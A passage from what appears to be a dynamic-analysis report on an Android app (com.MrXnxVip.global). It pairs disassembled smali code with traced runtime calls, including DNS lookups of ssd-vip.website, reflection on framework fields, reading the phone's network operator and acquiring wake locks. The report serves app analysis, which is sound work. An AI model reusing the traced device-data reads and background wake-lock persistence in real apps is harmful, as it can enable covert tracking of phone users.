                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed
                        • Time: 695344
                          • This:
                            • java.lang.reflect.Field@d247122
                            • getName:_vvvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Object@548b7b3
                        • Time: 695362
                          • This:
                            • java.lang.reflect.Field@f60f170
                            • getName:_vvvvvvvvv4
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.String@2771ce9
                        • Time: 695368
                          • This:
                            • java.lang.reflect.Field@cbc7d6e
                            • getName:_vvvvvvvvv5
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@9fb8f58, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@11d2117, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@d447eed, vvvvvvvvv3=java.lang.Object@548b7b3, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.String@b8d1c0f
                        • Time: 696031
                          • This:
                            • java.lang.reflect.Field@97a6ea2
                            • getName:_vvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • ""
                        • Time: 696034
                          • This:
                            • java.lang.reflect.Field@424eaf0
                            • getName:_vvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • false
                        • Time: 696038
                          • This:
                            • java.lang.reflect.Field@f05c61c
                            • getName:_vvvvvvvv7
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Object@d7a1225
                        • Time: 696039
                          • This:
                            • java.lang.reflect.Field@c1f2ffa
                            • getName:_vvvvvvvvv0
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • null
                        • Time: 696040
                          • This:
                            • java.lang.reflect.Field@f41c9ab
                            • getName:_vvvvvvvvv1
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808
                        • Time: 696041
                          • This:
                            • java.lang.reflect.Field@d5eaba1
                            • getName:_vvvvvvvvv2
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6
                        • Time: 696042
                          • This:
                            • java.lang.reflect.Field@d15587
                            • getName:_vvvvvvvvv3
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.Object@e9abcb4
                        • Time: 696044
                          • This:
                            • java.lang.reflect.Field@49960dd
                            • getName:_vvvvvvvvv4
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.String@2771ce9
                        • Time: 696045
                          • This:
                            • java.lang.reflect.Field@8bfc452
                            • getName:_vvvvvvvvv5
                          • p0: [vvvvvvvv0=, vvvvvvvv2=, vvvvvvvv3=false, vvvvvvvv4=, vvvvvvvv5=, vvvvvvvv6=, vvvvvvvv7=java.lang.Object@d7a1225, vvvvvvvvv0=null, vvvvvvvvv1=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpRequest@fb72808, vvvvvvvvv2=anywheresoftware.b4h.okhttp.OkHttpClientWrapper$OkHttpResponse@92051c6, vvvvvvvvv3=java.lang.Object@e9abcb4, vvvvvvvvv4=https://invalid-url/, vvvvvvvvv5=https, vvvvvvvvv6=null, vvvvvvvvv7=null, vvvvvvvvvv1=null, vvvvvvvvvv2=null, vvvvvvvvvv3=null, vvvvvvvvvv4=null]
                          • Return:
                            • java.lang.String@b8d1c0f
                        • Time: 824922
                          • This:
                            • com.MrXnxVip.global.httpjob@4606ada
                          • Return:
                            • java.lang.Class@4c6f501
                            • getName: com.MrXnxVip.global.httpjob
                        • 9 additional calls hidden ...
                        66goto_51: return-void
                        Cross References
                        APIs
                        • java.lang.Class.getDeclaredField
                        • java.lang.reflect.Field.get
                        • java.lang.Object.getClass
                        • java.lang.Class.getDeclaredField
                        • java.lang.reflect.Field.get
                        • java.lang.ref.WeakReference.get
                        • java.lang.Class.getDeclaredField
                        • java.lang.reflect.Field.get
                        Strings
                        • sharedProcessBA
                        • activityBA
                        • context
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Throws;
                        1value = {
                        2Ljava/lang/SecurityException;,
                        3Ljava/lang/NoSuchFieldException;,
                        4Ljava/lang/IllegalArgumentException;,
                        5Ljava/lang/IllegalAccessException;
                        6}
                        7.end annotation
                        8const-class v0, Lanywheresoftware/b4a/BA;
                        10const-string v1, "sharedProcessBA"
                        12invoke-virtual {v0, v1}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        • Time: 819994
                          • This:
                            • class anywheresoftware.b4a.BA
                            • getName:anywheresoftware.b4a.BA
                          • p0: sharedProcessBA
                          • Return:
                            • public final anywheresoftware.b4a.BA$SharedProcessBA anywheresoftware.b4a.BA.sharedProcessBA
                            • getName: sharedProcessBA
                        13move-result-object v0
                        15invoke-virtual {v0, p1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 819996
                          • This:
                            • public final anywheresoftware.b4a.BA$SharedProcessBA anywheresoftware.b4a.BA.sharedProcessBA
                            • getName:sharedProcessBA
                          • p0: anywheresoftware.b4a.BA@1b1349f
                          • Return:
                            • anywheresoftware.b4a.BA$SharedProcessBA@fa991d4
                        16move-result-object v0
                        18invoke-virtual {v0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
                        • Time: 819998
                          • This:
                            • anywheresoftware.b4a.BA$SharedProcessBA@fa991d4
                          • Return:
                            • class anywheresoftware.b4a.BA$SharedProcessBA
                            • getName: anywheresoftware.b4a.BA$SharedProcessBA
                        19move-result-object v1
                        21const-string v2, "activityBA"
                        23invoke-virtual {v1, v2}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        • Time: 819999
                          • This:
                            • class anywheresoftware.b4a.BA$SharedProcessBA
                            • getName:anywheresoftware.b4a.BA$SharedProcessBA
                          • p0: activityBA
                          • Return:
                            • public java.lang.ref.WeakReference anywheresoftware.b4a.BA$SharedProcessBA.activityBA
                            • getName: activityBA
                        24move-result-object v1
                        26invoke-virtual {v1, v0}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 820000
                          • This:
                            • public java.lang.ref.WeakReference anywheresoftware.b4a.BA$SharedProcessBA.activityBA
                            • getName:activityBA
                          • p0: anywheresoftware.b4a.BA$SharedProcessBA@fa991d4
                          • Return:
                            • null
                        27move-result-object v0
                        28check-cast v0, Ljava/lang/ref/WeakReference;
                        29if-eqz v0, :cond_27
                        31invoke-virtual {v0}, Ljava/lang/ref/WeakReference;->get()Ljava/lang/Object;
                        32move-result-object v0
                        33check-cast v0, Lanywheresoftware/b4a/BA;
                        34if-eqz v0, :cond_27
                        35move-object p1, v0
                        36cond_27:
                        37sget-object v0, Lanywheresoftware/b4j/object/JavaObject;->context:Ljava/lang/reflect/Field;
                        38if-nez v0, :cond_35
                        39const-class v0, Lanywheresoftware/b4a/BA;
                        41const-string v1, "context"
                        43invoke-virtual {v0, v1}, Ljava/lang/Class;->getDeclaredField(Ljava/lang/String;)Ljava/lang/reflect/Field;
                        • Time: 820003
                          • This:
                            • class anywheresoftware.b4a.BA
                            • getName:anywheresoftware.b4a.BA
                          • p0: context
                          • Return:
                            • public final android.content.Context anywheresoftware.b4a.BA.context
                            • getName: context
                        44move-result-object v0
                        45sput-object v0, Lanywheresoftware/b4j/object/JavaObject;->context:Ljava/lang/reflect/Field;
                        46cond_35:
                        47sget-object v0, Lanywheresoftware/b4j/object/JavaObject;->context:Ljava/lang/reflect/Field;
                        49invoke-virtual {v0, p1}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
                        • Time: 820004
                          • This:
                            • public final android.content.Context anywheresoftware.b4a.BA.context
                            • getName:context
                          • p0: anywheresoftware.b4a.BA@1b1349f
                          • Return:
                            • com.MrXnxVip.global.newmessage1@9fe7bbb
                        50move-result-object p1
                        52invoke-virtual {p0, p1}, Lanywheresoftware/b4j/object/JavaObject;->setObject(Ljava/lang/Object;)V
                        53return-object p0
                        APIs
                        • java.net.InetAddress.getAllByName
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.net.UnknownHostException.<init>
                        • java.net.UnknownHostException.initCause
                        Strings
                        • hostname
                        • ssd-vip.website
                        • InetAddress.getAllByName(hostname)
                        • Broken system behaviour for dns lookup of
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/String;",
                        4")",
                        5"Ljava/util/List<",
                        6"Ljava/net/InetAddress;",
                        7">;"
                        8}
                        9.end annotation
                        11const-string v0, "hostname"
                        13invoke-static {p1, v0}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullParameter(Ljava/lang/Object;Ljava/lang/String;)V
                        14try_start_5:
                        15invoke-static {p1}, Ljava/net/InetAddress;->getAllByName(Ljava/lang/String;)[Ljava/net/InetAddress;
                        • Time: 697982
                          • p0: ssd-vip.website
                          • Return:
                            • [Ljava.net.InetAddress;@59ee5ac
                            • Arrays.toString: [ssd-vip.website/104.21.33.223, ssd-vip.website/172.67.151.21]
                        • Time: 698526
                          • p0: ssd-vip.website
                          • Return:
                            • [Ljava.net.InetAddress;@8bbdfc2
                            • Arrays.toString: [ssd-vip.website/104.21.33.223, ssd-vip.website/172.67.151.21]
                        • Time: 820251
                          • p0: ssd-vip.website
                          • Return:
                            • [Ljava.net.InetAddress;@812f6e2
                            • Arrays.toString: [ssd-vip.website/104.21.33.223, ssd-vip.website/172.67.151.21]
                        16move-result-object v0
                        18const-string v1, "InetAddress.getAllByName(hostname)"
                        20invoke-static {v0, v1}, Lkotlin/jvm/internal/Intrinsics;->checkNotNullExpressionValue(Ljava/lang/Object;Ljava/lang/String;)V
                        22invoke-static {v0}, Lkotlin/collections/ArraysKt;->toList([Ljava/lang/Object;)Ljava/util/List;
                        23move-result-object p1
                        24try_end_12: return-object p1
                        25catch_13: move-exception v0
                        26new-instance v1, Ljava/net/UnknownHostException;
                        27new-instance v2, Ljava/lang/StringBuilder;
                        29invoke-direct {v2}, Ljava/lang/StringBuilder;-><init>()V
                        31const-string v3, "Broken system behaviour for dns lookup of "
                        33invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        35invoke-virtual {v2, p1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        37invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        38move-result-object p1
                        40invoke-direct {v1, p1}, Ljava/net/UnknownHostException;-><init>(Ljava/lang/String;)V
                        41check-cast v0, Ljava/lang/Throwable;
                        43invoke-virtual {v1, v0}, Ljava/net/UnknownHostException;->initCause(Ljava/lang/Throwable;)Ljava/lang/Throwable;
                        44check-cast v1, Ljava/lang/Throwable;
                        45throw v1
                        Cross References
                        APIs
                        • java.lang.String.valueOf
                        • java.lang.StringBuilder.<init>
                        • java.lang.StringBuilder.append
                        • java.lang.StringBuilder.toString
                        • java.lang.Class.forName
                        • java.lang.Class.getMethod
                        • java.lang.reflect.Method.invoke
                        • java.lang.Boolean.booleanValue
                        • java.lang.RuntimeException.<init>
                        Strings
                        • .main
                        • isAnyActivityVisible
                        Position Instruction Meta Information
                        0try_start_0:
                        1sget-object v0, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        2if-nez v0, :cond_6
                        3const/4 v0, 0x0
                        4return v0
                        5cond_6: new-instance v0, Ljava/lang/StringBuilder;
                        7sget-object v1, Lanywheresoftware/b4a/BA;->packageName:Ljava/lang/String;
                        9invoke-static {v1}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
                        10move-result-object v1
                        12invoke-direct {v0, v1}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
                        14const-string v1, ".main"
                        16invoke-virtual {v0, v1}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
                        18invoke-virtual {v0}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
                        19move-result-object v0
                        21invoke-static {v0}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
                        22move-result-object v0
                        24const-string v1, "isAnyActivityVisible"
                        25const/4 v2, 0x0
                        27invoke-virtual {v0, v1, v2}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
                        • Time: 696118
                          • This:
                            • class com.MrXnxVip.global.main
                            • getName:com.MrXnxVip.global.main
                          • p0: isAnyActivityVisible
                          • p1: null
                          • Return:
                            • public static boolean com.MrXnxVip.global.main.isAnyActivityVisible()
                            • getName: isAnyActivityVisible
                        28move-result-object v0
                        30invoke-virtual {v0, v2, v2}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
                        31move-result-object v0
                        32check-cast v0, Ljava/lang/Boolean;
                        34invoke-virtual {v0}, Ljava/lang/Boolean;->booleanValue()Z
                        35move-result v0
                        36try_end_2f: return v0
                        37catch_30: move-exception v0
                        38new-instance v1, Ljava/lang/RuntimeException;
                        40invoke-direct {v1, v0}, Ljava/lang/RuntimeException;-><init>(Ljava/lang/Throwable;)V
                        41throw v1
                        Cross References
                        APIs
                        • android.app.Application.getSystemService
                        • android.telephony.TelephonyManager.getPhoneType
                        • android.telephony.TelephonyManager.getNetworkOperatorName
                        • java.util.Locale.getDefault
                        • java.lang.String.toLowerCase
                        • java.lang.Exception.printStackTrace
                        • java.lang.String.length
                        Strings
                        • phone
                        • T-Mobile Deutschland GmbH
                        Position Instruction Meta Information
                        1iget-object v0, p0, Lcom/reza/sh/deviceinfo/DiviceInfo;->initialVal:Ljava/lang/String;
                        3sget-object v1, Lanywheresoftware/b4a/BA;->applicationContext:Landroid/app/Application;
                        5const-string v2, "phone"
                        7invoke-virtual {v1, v2}, Landroid/app/Application;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        • Time: 690141
                          • This:
                            • android.app.Application@feb8753
                          • name: phone
                          • Return:
                            • android.telephony.TelephonyManager@ceb9b30
                        8move-result-object v1
                        9check-cast v1, Landroid/telephony/TelephonyManager;
                        10if-eqz v1, :cond_26
                        11try_start_e:
                        12invoke-virtual {v1}, Landroid/telephony/TelephonyManager;->getPhoneType()I
                        • Time: 690424
                          • This:
                            • android.telephony.TelephonyManager@ceb9b30
                          • Return:
                            • 1
                        13move-result v2
                        14const/4 v3, 0x2
                        15if-eq v2, v3, :cond_26
                        17invoke-virtual {v1}, Landroid/telephony/TelephonyManager;->getNetworkOperatorName()Ljava/lang/String;
                        • Time: 690525
                          • This:
                            • android.telephony.TelephonyManager@ceb9b30
                          • Return:
                            • T-Mobile Deutschland GmbH
                        18move-result-object v1
                        20invoke-static {}, Ljava/util/Locale;->getDefault()Ljava/util/Locale;
                        21move-result-object v2
                        23invoke-virtual {v1, v2}, Ljava/lang/String;->toLowerCase(Ljava/util/Locale;)Ljava/lang/String;
                        24move-result-object v0
                        25try_end_21: goto/16 :goto_26
                        26catch_22: move-exception v1
                        28invoke-virtual {v1}, Ljava/lang/Exception;->printStackTrace()V
                        29cond_26:
                        30invoke-virtual {v0}, Ljava/lang/String;->length()I
                        31move-result v1
                        32if-nez v1, :cond_2e
                        34iget-object v0, p0, Lcom/reza/sh/deviceinfo/DiviceInfo;->initialVal:Ljava/lang/String;
                        35cond_2e:
                        36invoke-direct {p0, v0}, Lcom/reza/sh/deviceinfo/DiviceInfo;->handleIllegalCharacterInResult(Ljava/lang/String;)Ljava/lang/String;
                        37move-result-object v0
                        38return-object v0
                        Cross References
                        APIs
                        • android.os.PowerManager$WakeLock.isHeld
                        • android.content.Context.getSystemService
                        • android.os.PowerManager.newWakeLock
                        • android.os.PowerManager$WakeLock.acquire
                        Strings
                        • WakeLock already held.
                        • power
                        • B4A
                        Position Instruction Meta Information
                        1sget-object v0, Lanywheresoftware/b4a/phone/Phone$PhoneWakeState;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        2if-eqz v0, :cond_10
                        4invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->isHeld()Z
                        5move-result v0
                        6if-eqz v0, :cond_10
                        8const-string p0, "WakeLock already held."
                        10invoke-static {p0}, Lanywheresoftware/b4a/keywords/Common;->Log(Ljava/lang/String;)V
                        • Time: 812176
                          • p0: WakeLock already held.
                        11return-void
                        12cond_10:
                        13iget-object p0, p0, Lanywheresoftware/b4a/BA;->context:Landroid/content/Context;
                        15const-string v0, "power"
                        17invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        • Time: 689579
                          • This:
                            • com.MrXnxVip.global.firebasemessaging@16ac540
                          • p0: android-installer
                          • Return:
                            • android.os.PowerManager@a4a4cc9
                        • Time: 824689
                          • This:
                            • com.MrXnxVip.global.firebasemessaging@f2f534
                          • p0: power
                          • Return:
                            • android.os.PowerManager@3a0ea4a
                        18move-result-object p0
                        19check-cast p0, Landroid/os/PowerManager;
                        20if-eqz p1, :cond_1f
                        21const/16 p1, 0xa
                        22goto/16 :goto_20
                        23cond_1f: const/4 p1, 0x6
                        24goto_20: const/high16 v0, 0x10000000
                        25or-int/2addr p1, v0
                        27const-string v0, "B4A"
                        29invoke-virtual {p0, p1, v0}, Landroid/os/PowerManager;->newWakeLock(ILjava/lang/String;)Landroid/os/PowerManager$WakeLock;
                        30move-result-object p0
                        31sput-object p0, Lanywheresoftware/b4a/phone/Phone$PhoneWakeState;->wakeLock:Landroid/os/PowerManager$WakeLock;
                        33invoke-virtual {p0}, Landroid/os/PowerManager$WakeLock;->acquire()V
                        34return-void
                        Cross References
                        APIs
                        • android.os.PowerManager$WakeLock.isHeld
                        • android.content.Context.getSystemService
                        • android.os.PowerManager.newWakeLock
                        • android.os.PowerManager$WakeLock.acquire
                        Strings
                        • Partial wakeLock already held.
                        • power
                        • B4A-Partial
                        Position Instruction Meta Information
                        1sget-object v0, Lanywheresoftware/b4a/phone/Phone$PhoneWakeState;->partialLock:Landroid/os/PowerManager$WakeLock;
                        2if-eqz v0, :cond_10
                        4invoke-virtual {v0}, Landroid/os/PowerManager$WakeLock;->isHeld()Z
                        5move-result v0
                        6if-eqz v0, :cond_10
                        8const-string p0, "Partial wakeLock already held."
                        10invoke-static {p0}, Lanywheresoftware/b4a/keywords/Common;->Log(Ljava/lang/String;)V
                        11return-void
                        12cond_10:
                        13iget-object p0, p0, Lanywheresoftware/b4a/BA;->context:Landroid/content/Context;
                        15const-string v0, "power"
                        17invoke-virtual {p0, v0}, Landroid/content/Context;->getSystemService(Ljava/lang/String;)Ljava/lang/Object;
                        • Time: 812172
                          • This:
                            • com.MrXnxVip.global.pnservices@cde13cd
                          • p0: android-installer
                          • Return:
                            • android.os.PowerManager@7e03cfc
                        • Time: 824751
                          • This:
                            • com.MrXnxVip.global.pnservices@27d5149
                          • p0: power
                          • Return:
                            • android.os.PowerManager@397a468
                        18move-result-object p0
                        19check-cast p0, Landroid/os/PowerManager;
                        20const/4 v0, 0x1
                        22const-string v1, "B4A-Partial"
                        24invoke-virtual {p0, v0, v1}, Landroid/os/PowerManager;->newWakeLock(ILjava/lang/String;)Landroid/os/PowerManager$WakeLock;
                        25move-result-object p0
                        26sput-object p0, Lanywheresoftware/b4a/phone/Phone$PhoneWakeState;->partialLock:Landroid/os/PowerManager$WakeLock;
                        28invoke-virtual {p0}, Landroid/os/PowerManager$WakeLock;->acquire()V
                        29return-void
                        Cross References
                        APIs
                        • java.lang.Integer.TYPE:Ljava/lang/Class
                        • java.lang.Integer.TYPE:Ljava/lang/Class
                        • java.lang.Float.TYPE:Ljava/lang/Class
                        • java.lang.Class.getMethod
                        • java.lang.Integer.valueOf
                        • java.lang.Integer.valueOf
                        • java.lang.Float.valueOf
                        • java.lang.reflect.Method.invoke
                        Strings
                        • LS_general
                        Position Instruction Meta Information
                        0.annotation system Ldalvik/annotation/Signature;
                        1value = {
                        2"(",
                        3"Ljava/lang/Class<",
                        4"*>;",
                        5"Ljava/lang/String;",
                        6"Lanywheresoftware/b4a/keywords/LayoutValues;",
                        7"Lanywheresoftware/b4a/BA;",
                        8"Landroid/view/View;",
                        9"Ljava/util/Map<",
                        10"Ljava/lang/String;",
                        11"Lanywheresoftware/b4a/keywords/LayoutBuilder$ViewWrapperAndAnchor;",
                        12">;",
                        13"Ljava/util/Map<",
                        14"Ljava/lang/String;",
                        15"Ljava/lang/Object;",
                        16">;IIF)V"
                        17}
                        18.end annotation
                        19.annotation system Ldalvik/annotation/Throws;
                        20value = {
                        21Ljava/lang/NoSuchMethodException;,
                        22Ljava/lang/SecurityException;,
                        23Ljava/lang/IllegalAccessException;,
                        24Ljava/lang/IllegalArgumentException;,
                        25Ljava/lang/reflect/InvocationTargetException;
                        26}
                        27.end annotation
                        28const/16 v0, 0x8
                        29new-array v1, v0, [Ljava/lang/Class;
                        30const-class v2, Lanywheresoftware/b4a/BA;
                        31const/4 v3, 0x0
                        32aput-object v2, v1, v3
                        33const-class v2, Landroid/view/View;
                        34const/4 v4, 0x1
                        35aput-object v2, v1, v4
                        36const-class v2, Lanywheresoftware/b4a/keywords/LayoutValues;
                        37const/4 v5, 0x2
                        38aput-object v2, v1, v5
                        39const-class v2, Ljava/util/Map;
                        40const/4 v6, 0x3
                        41aput-object v2, v1, v6
                        42const-class v2, Ljava/util/Map;
                        43const/4 v7, 0x4
                        44aput-object v2, v1, v7
                        46sget-object v2, Ljava/lang/Integer;->TYPE:Ljava/lang/Class;
                        47const/4 v8, 0x5
                        48aput-object v2, v1, v8
